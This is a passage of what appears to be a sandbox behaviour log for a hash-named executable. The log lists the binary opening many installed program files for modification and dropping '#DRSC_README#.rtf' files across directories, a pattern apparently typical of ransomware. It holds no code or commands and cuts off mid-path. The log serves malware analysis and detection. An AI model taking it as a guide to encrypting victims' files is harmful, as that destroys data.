710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_CN.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Denver 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmap.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\cacerts 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\StartAdd.dotm 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Abidjan 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\vi.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Prague 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Melbourne 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Rainy_River 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.STD 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\hi.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javah.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.attributeTransformation.exsd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\LogoCanary.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\MET 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-3 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans_1.2.200.v20140214-0004.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Lindeman 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiItalic.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AboutBox.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.preferences_3.5.200.v20140224-1527.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Kaliningrad 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cuiaba 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\tzmappings 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Belgrade 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Nauru 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\content-types.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Palau 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\pop3.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.registry_3.5.400.v20140428-1507.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui_4.0.100.v20140401-0608.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\core_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\20200723104606.pma 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jvisualvm.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\content-types.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\DataMatrix.pmp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\gmail.crx 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Catamarca 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\view.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\MST7 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\am.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Grand_Turk 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\jhall-2.0_05.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.configuration_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightItalic.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_pl.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hebron 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker_1.1.200.v20131119-0908.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.RSD 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui_2.3.0.v20140404-1657.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\uninstall.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Chagos 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Enderbury 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dataset.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\db\bin\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Madeira 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\default.jfc 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Efate 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\pingsender.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunec.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\ConnectHide.xla 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-plaf.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Boise 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets_1.0.0.v20140514-1823.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\nb.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+8 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\sound.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler_1.2.0.v20140422-1847.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Khandyga 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql70.xsl 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pontianak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.util_8.1.14.v20131031.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_70.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Sakhalin 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\dblook.bat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bogota 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Cape_Verde 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\toc.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\title.htm 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_CopyDrop32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroBroker.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll.sig 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hovd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Lindeman 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Monaco 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\imap.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Sao_Paulo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Bermuda 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santo_Domingo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jconsole.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santiago 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Hermosillo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_cs.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jawt.h 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.catalog 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Jujuy 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-4 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-oql.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\security\US_export_policy.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\management\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft.Office.InfoPath.targets 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmid.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ext_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Uzhgorod 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfig.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+9 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program 